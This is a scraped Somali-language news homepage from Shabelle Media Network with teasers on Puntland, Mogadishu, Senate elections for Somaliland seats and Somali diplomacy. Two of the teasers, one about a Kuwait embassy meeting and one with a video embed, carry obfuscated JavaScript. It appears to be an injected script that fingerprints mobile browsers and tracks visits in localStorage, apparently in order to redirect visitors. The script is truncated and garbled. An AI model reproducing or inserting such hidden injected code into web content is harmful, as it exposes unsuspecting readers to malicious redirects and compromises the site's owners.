Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Sawirro: Saciid Deni oo qaabilay Safiirka Ingiriiska ee Soomaaliya

GAROOWE (SMN) - Madaxweynaha Puntland Mudane Saciid Cabdullaahi  Deni, ayaa Qasriga Madaxtooyada Puntland ku qaabilay Safiirka Dowladda Ingiriiska ee Soomaaliya Kate Foster. Kulanka ayaa looga hadlay arrimaha Puntland sida Nidaamka dimuqraadiyadda ee Puntland ku tallaabsatay, xaaladda Covid-19 iyo guud ahaan xaaladda Soomaaliya gaar ahaan sidii xal looga gaari lahaa arrimaha siyaasadda ee taagan. Dowladda Ingiriiska ayaa la wadaagtay madaxweynaha hambalyo ku...

Duqa Muqdisho oo kormeeray isbitaalka Banaadir + Sawirro

MUQDISHO (SMN) - Gudoomiyaha Gobalka Banaadir Ahna Duqa magaalada Muqdisho Mudane Cumar Maxamud Maxamed (Cumar Filish) ayaa maanta kormeeray isbitaalka Hooyada iyo Dhalaanka ee Banaadir oo si bilaash ah loogu qidmeeyo bulshada Caasimadda. Kormeerkan waxaa duqa magaalada Muqdisho ku wehlinaaye wasiirka Caafimaadka XFS Marwo Fowziyo Abiikar Nuur, iyagoo warbixin ku saabsan xaalada isbitaalka ka dhageestay maamulka Isbitaal Banaadir kuwaas oo tilmaamay...

Muxuu ra’iisul wasaaraha Soomaaliya ka yiri xaaladda guud ee dalka?

MUQDISHO (SMN) - Ra'iisul wasaaraha xukuumadda Soomaaliya, Maxamed Xuseen Rooble oo khudbad ka jeediyay munaasabaddda hadal jeedinta musharixiinta Aqalka Sare ee gobollada waqooyi ee Somaliland ayaa ka hadlay xaaladda siyaasadeed ee dalka. "Xaaladda dalka maanta wuxuu marayaa meel fiican doorasho ayaan ku jirnaa, khilaafaad wey iska yimaadaan laakin wax weyn maahan, wax weyn aan loo qaadanin wax walba waxaa ka...

Danjiraha Soomaaliya ee Kuwait oo kulan laqaatay dhiggiisa dalka Tunisia

Kuwait (SMN) - Danjiraha JFS ee Kuwait Mudane  Dr Abdullahi Mohammed Odowa ayaa maanta xafiiska ku qaabiley Danjiraha Tunisia ujooga Kuwait Mudane  Hechemi Agili. Labada masuul ayaa kawada hadleen xidhiidhka taariikhiga ah ee labada wadan ee walaalaha u dhaxeeya iyo sidii loosii xoojin lahaa iyo.isbadaladda siyaasaddeed ee Tunisia ka dhacaya. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function...

Hadal jeedinta musharixiinta Aqalka sare ee S/land oo ka socota Xalane

MUQDISHO (SMN) - Hadal jeedinta musharixiinta Aqalka Sare ee gobolada waqooyi ayaa goor dhow ka bilaabatay hoolka Teendhada Afisyoone ee Xerada Xalane. Musaanabadda furitaanka hadal jeedinta ayaa waxa ka qayb Galay Ra’iisul wasaaraha Dalka Mudane Maxamed Xuseen Rooble iyo marti sharaf kale. Khudbadaha musharixiinta ayaa qorshuhu yahay in maanta la soo gabo -gabeeyo, iyada oo isla beri ay bilaaban doonto soorashada...

Bayle oo ka qeyb-galay barnaamij qeyb ka ah deyn cafinta Soomaaliya

MUQDISHO (SMN) - Wasiirka maaliyadda Cabdiraxmaan Ducaale Bayle ayaa daah furay toddobaadkii dheeraa’ ee shirka dib-u-eegista wixii ka qabsoomay Barnaamijka (ECF) ee hanaanka deyn_Cafinta Soomaaliya. “Muddada Todobaadka ah ee uu socdo shirka IMF/Bangiga Adduunka waxa aan diiradda ku saareynaa saameynta Covid-19 ee dhaqaalaha Soomaaliya iyo qaabkii wax looga qaban lahaa, sidoo kale waxa aan si wadajir ah dib ugu eegeynaa...

Sawirro: Rooble oo war cusub kasoo saaray kiiska Ikraan Tahliil Faarax

MUQDISHO (SMN) - Ra’iisul Wasaaraha Soomaaliya Maxamed Xuseen Rooble, oo maanta hadal u jeediyey murashaxiinta iyo Ergada Aqalka Sare Gobollada Waqooyi ee Somaliland, ayaa ka hadlay kiiska Ikraan Tahliil Faarax ee khilaafka ka dhex dhaliyey madaxda dowladda federaalka. Rooble ayaa xusay in mar walba uu u taagan yahay caddaaladda bulshada Soomaaliyeed, isla markaana kiiska Sarkaal Ikraan Tahliil Faarax laga weecin...

Dhageyso: Warka Duhur Ee Idaacada Shabelle

video
<iframe src="https://www.facebook.com/plugins/video.php?height=314&href=https%3A%2F%2Fwww.facebook.com%2Fradioshabelle%2Fvideos%2F239244801498760%2F&show_text=true&width=560&t=0" width="560" height="429" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowfullscreen="true" allow="autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share" allowFullScreen="true"></iframe> function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const...

Maalgelinta Qardu Xasan oo laga bixiyay KM5

MUQDISHO - Ganacsato yaryar oo ku sugan Muqdisho, ayaa ka faa’ideystay maalgalinta Qardu Xasan (free Microfinance) ee Salaam Somali Bank Maanta oo Isniin ah. Xarunta Salaam Somali Bank ee Zoobe ayaa ganacsatada lagu gudoonsiiyay lacago aan faa’ido laga rabin oo loogu tala galay inay ku kobciyaan ganacsiyadooda yaryar. Maalgelinta Qardu Xasan ayaa horey looga sameeyay xaruumaha bangiga Salaam Somali bank...

Safiiradda Soomaaliya ee Tanzania oo waraaqaha aqoonsiga laga guddoomay

DODOMA (SMN) - Marwo Danjire Sahra Cali Xasan, ayaa maanta oo Isniin ah, warqadaheeda aqoonsiga danjirannimo ee Jamhuuriyadda Midowday ee Tanzania ku wareejisay Madaxweynaha dalkaasi , (Marwo) Samia Suluhu Hassan, kadib munaasabad lagu qabtay Aqalka Madaxtooyada oo ku yaalla Caasimadda Dodoma. Intii lagu gudo jiray munaasabadda waqad gudbinta, waxa ay Danjire Sahra Xasan la wadaagtay Madaxweynaha Tanzania fariin salaan ah...

WARAR KALE

Somalia Takes Part in Islamic Data Protection Network Meeting in Turkey

ISTANBUL – Somalia's Director General of the Public Data Protection Authority, Mohamed Nur Olow, took part in the second meeting of the Executive Committee...

Somalia Condemns Abuse of Young Woman After Video Circulates Online

MOGADISHU – Somalia's Ministry of Family and Human Rights Development has strongly condemned what it described as a "barbaric" assault on the dignity and...

Clashes Erupt Near Baidoa Between SNA Forces and Fighters Loyal to Former Southwest Leader

BAIDOA, Somalia – Heavy fighting broke out near the southwestern Somali city of Baidoa overnight between government forces and fighters loyal to former Southwest...